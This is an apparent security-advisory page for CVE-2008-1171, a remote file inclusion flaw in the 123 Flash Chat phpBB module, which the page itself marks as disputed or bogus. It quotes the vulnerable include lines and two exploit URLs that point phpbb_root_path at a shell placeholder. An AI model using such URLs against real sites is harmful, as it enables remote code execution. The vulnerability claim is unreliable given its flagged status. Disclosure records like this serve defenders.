123 Flash Chat Module for phpBB

WARNING! Fake news / Disputed / BOGUS

123 Flash Chat Module for phpBB

2008.03.06

Credit: F10

Risk: High

Local: No

Remote: Yes

CVE: CVE-2008-1171

CWE: CWE-94

CVSS Base Score: 6.8/10

Impact Subscore: 6.4/10

Exploitability Subscore: 8.6/10

Exploit range: Remote

Attack complexity: Medium

Authentication: No required

Confidentiality impact: Partial

Integrity impact: Partial

Availability impact: Partial

########################################################################
#################
Script : 123 Flash Chat Module for phpBB #
Discovered By : F10 #
Contact : by_f10 (at) hotmail (dot) com [email concealed] #
Site : http://by-f10.com #
Greetz : by_emR3 , H0tturk , TaRanTuLa , gsy , ercu_145 , #
LupuS , m0sted , CyberGhost ... . #
From : Turkey #
Download : http://php.arsivimiz.com/indir.php?ID=996&sIslem=Indir #
########################################################################
#################
The bugs are in :
path/123flashchat.php include($phpbb_root_path . 'extension.inc');
path/123flashchat.php include($phpbb_root_path . 'common.'.$phpEx);
path/phpbb_login_chat.php include($phpbb_root_path . 'extension.inc');
path/phpbb_login_chat.php include($phpbb_root_path . 'common.'.$phpEx);
exploitz :
www.site.com/path/123flashchat.php?phpbb_root_path=[shell]
www.site.com/path/phpbb_login_chat.php?phpbb_root_path=[shell]

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

123 Flash Chat Module for phpBB

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.